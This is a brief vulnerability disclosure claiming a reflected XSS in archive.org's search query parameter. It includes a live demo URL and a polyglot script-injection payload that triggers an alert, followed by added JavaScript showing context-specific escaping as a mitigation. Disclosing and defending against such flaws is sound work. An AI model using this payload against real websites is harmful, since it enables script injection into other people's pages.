#Exploit Title : archive.org XSS
#Date : 2020/3/29
#Exploit Author : AmirAli Sadeghi Tamiz
#Tested on : win10
#Demo : https://archive.org/search.php?query=’;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

#POC:
1- Go to archive.org
2- Go to the metadata search (archive.org/search.php?query=)
3- The query parameter is vulnerable
4- Payload is: ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
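
Mitigation side of the PoC above, as an added example that is not part of the original advisory or archive.org's code: the step 4 string carries delimiters for several output contexts at once, so a reflected query value needs encoding matched to each sink. The function names, the four sinks and the sample string are assumptions; the advisory does not say where the value was reflected.

```javascript
// Added example, not code from the advisory or from archive.org.
// Constructed probe carrying the same delimiter classes as the step 4 string.
const SAMPLE = `';x//";x//--></SCRIPT>">'><SCRIPT>x</SCRIPT>`;

// HTML text and quoted-attribute sinks: encode every character that can end
// a text node, close an attribute value or start an entity.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Inline <script> sink: emit a JSON string literal, then \u-escape what the
// HTML parser or the JS lexer could still act on inside it.
function escapeJsString(value) {
  return JSON.stringify(String(value))
    .replace(/[<>&'\u2028\u2029]/g,
      (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// URL query-component sink: percent-encode, including the characters that
// encodeURIComponent leaves alone.
function escapeUrlParam(value) {
  return encodeURIComponent(String(value))
    .replace(/[!'()*]/g, (c) => '%' + c.charCodeAt(0).toString(16).toUpperCase());
}

// Hypothetical results template that reflects the query into four sinks.
function renderResultsPage(query) {
  return [
    `<h1>Results for ${escapeHtml(query)}</h1>`,
    `<input name="query" value="${escapeHtml(query)}">`,
    `<script>var q = ${escapeJsString(query)};</script>`,
    `<a href="/search.php?query=${escapeUrlParam(query)}">permalink</a>`,
  ].join('\n');
}

console.log(renderResultsPage(SAMPLE));
```

Each encoder is only safe in the sink it is named for; the URL value in the last line still sits inside a double-quoted attribute, which the percent-encoding keeps free of quote characters.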




